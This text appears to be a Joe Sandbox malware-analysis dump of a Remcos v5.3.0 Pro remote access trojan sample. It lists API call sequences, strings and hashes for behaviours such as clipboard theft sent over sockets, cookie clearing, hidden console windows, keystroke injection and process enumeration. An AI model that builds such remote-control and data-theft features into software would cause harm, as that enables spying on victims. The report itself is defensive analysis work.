                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnumInfoOpenQuerysend
                              • String ID: TUF$TUFTUF$>G$DG$DG
                              • API String ID: 3114080316-72097156
                              • Opcode ID: 3ad5bd36dfa565136e8aa744edffe012d565943c891bf2a6a09c828a98171038
                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                              • Opcode Fuzzy Hash: 3ad5bd36dfa565136e8aa744edffe012d565943c891bf2a6a09c828a98171038
                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                              • String ID: .part
                              • API String ID: 1303771098-3499674018
                              • Opcode ID: 9b955bb3b7786f571ce6ec872cb1de68ca0fa72ecc1e14eaff3f47b12c220e13
                              • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                              • Opcode Fuzzy Hash: 9b955bb3b7786f571ce6ec872cb1de68ca0fa72ecc1e14eaff3f47b12c220e13
                              • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                              APIs
                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                              • _wcslen.LIBCMT ref: 0041A8F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                              • API String ID: 3286818993-703403762
                              • Opcode ID: 0898a57a10710cf92ae4dfa81bccb6952f253845dccddd10a932c17125b7a1ed
                              • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                              • Opcode Fuzzy Hash: 0898a57a10710cf92ae4dfa81bccb6952f253845dccddd10a932c17125b7a1ed
                              • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                              APIs
                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TUF
                              • API String ID: 1133728706-1738023494
                              • Opcode ID: 5049584b33ee49fad3daf964693ef0e5ef4d72208f5cfc6b374b1e65dfb7401f
                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                              • Opcode Fuzzy Hash: 5049584b33ee49fad3daf964693ef0e5ef4d72208f5cfc6b374b1e65dfb7401f
                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                              APIs
                              • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                              • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Console$Window$AllocOutputShow
                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                              • API String ID: 4067487056-2527699604
                              • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                              • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                              APIs
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                              • __alloca_probe_16.LIBCMT ref: 004499E2
                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                              • __alloca_probe_16.LIBCMT ref: 00449AC7
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                              • __freea.LIBCMT ref: 00449B37
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • __freea.LIBCMT ref: 00449B40
                              • __freea.LIBCMT ref: 00449B65
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                              • String ID:
                              • API String ID: 3864826663-0
                              • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                              • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                              APIs
                              • SendInput.USER32 ref: 00418B08
                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                              • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InputSend$Virtual
                              • String ID:
                              • API String ID: 1167301434-0
                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                              • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                              • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                              APIs
                              • OpenClipboard.USER32 ref: 00415A46
                              • EmptyClipboard.USER32 ref: 00415A54
                              • CloseClipboard.USER32 ref: 00415A5A
                              • OpenClipboard.USER32 ref: 00415A61
                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                              • CloseClipboard.USER32 ref: 00415A89
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                              • String ID:
                              • API String ID: 2172192267-0
                              • Opcode ID: b7aa8b19805f5f05fe72c04a212158e36f523d6116912796236e9c544eb290f4
                              • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                              • Opcode Fuzzy Hash: b7aa8b19805f5f05fe72c04a212158e36f523d6116912796236e9c544eb290f4
                              • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                              APIs
                              • _free.LIBCMT ref: 00447EBC
                              • _free.LIBCMT ref: 00447EE0
                              • _free.LIBCMT ref: 00448067
                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                              • _free.LIBCMT ref: 00448233
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                              • String ID:
                              • API String ID: 314583886-0
                              • Opcode ID: b6bc52503377ed9d6f1f9e4f23e77935edc363574d887804d00f446c38a2ef84
                              • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                              • Opcode Fuzzy Hash: b6bc52503377ed9d6f1f9e4f23e77935edc363574d887804d00f446c38a2ef84
                              • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                              • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                              APIs
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • _free.LIBCMT ref: 00444086
                              • _free.LIBCMT ref: 0044409D
                              • _free.LIBCMT ref: 004440BC
                              • _free.LIBCMT ref: 004440D7
                              • _free.LIBCMT ref: 004440EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$AllocateHeap
                              • String ID: J7D
                              • API String ID: 3033488037-1677391033
                              • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                              • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                              APIs
                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
                              • __fassign.LIBCMT ref: 0044A180
                              • __fassign.LIBCMT ref: 0044A19B
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                              • String ID:
                              • API String ID: 1324828854-0
                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID: HE$HE
                              • API String ID: 269201875-1978648262
                              • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                              • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                              APIs
                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                              • String ID: PgF
                              • API String ID: 2180151492-654241383
                              • Opcode ID: 8005778e5296f2a99c7d365f02c4ed7d33b176b6b7ddea45d04adc7a43fcaf7e
                              • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                              • Opcode Fuzzy Hash: 8005778e5296f2a99c7d365f02c4ed7d33b176b6b7ddea45d04adc7a43fcaf7e
                              • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                              • _ValidateLocalCookies.LIBCMT ref: 00437B41
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                              • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                              • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
